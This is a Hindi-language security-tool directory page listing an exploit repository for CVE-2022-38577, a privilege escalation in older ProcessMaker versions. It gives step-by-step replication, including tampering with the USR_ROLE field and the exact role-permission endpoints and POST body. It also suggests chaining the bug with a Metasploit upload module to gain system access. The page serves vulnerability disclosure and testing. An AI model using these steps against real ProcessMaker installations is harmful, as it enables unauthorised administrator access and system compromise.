Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-38577-Processmaker — ProcessMaker v3.5.4 से पहले के संस्करण में उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर असुरक्षित अनुमतियाँ पाई गईं। यह कमजोरी हमलावरों को सामान्य उपयोगकर्ताओं को प्रशासक बनाने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ProcessMaker v3.5.4 से पहले के संस्करण में उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर असुरक्षित अनुमतियाँ पाई गईं। यह कमजोरी हमलावरों को सामान्य उपयोगकर्ताओं को प्रशासक बनाने की अनुमति देती है।

रिपॉजिटरी देखें
3131 साल पहलेअभी तक समीक्षित नहीं

This repository has be archived and moved to: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - उपयोगकर्ता प्रोफ़ाइल विशेषाधिकार वृद्धि

CVE-2022-38577

ProcessMaker v3.5.4 से पहले के संस्करण में उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर असुरक्षित अनुमतियाँ पाई गईं। यह कमजोरी हमलावरों को सामान्य उपयोगकर्ताओं को प्रशासक बनाने की अनुमति देती है।

* यह शोषण Metasploit मॉड्यूल (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload के साथ उपयोग किया जा सकता है ताकि सिस्टम तक पहुंच प्राप्त की जा सके।

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - उपयोगकर्ता प्रोफ़ाइल विशेषाधिकार वृद्धि

TODO: कोड [requests मॉड्यूल] को अनुकूलित करें, और अपवाद प्रबंधन।

संदर्भ:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

टूल डाउनलोड करें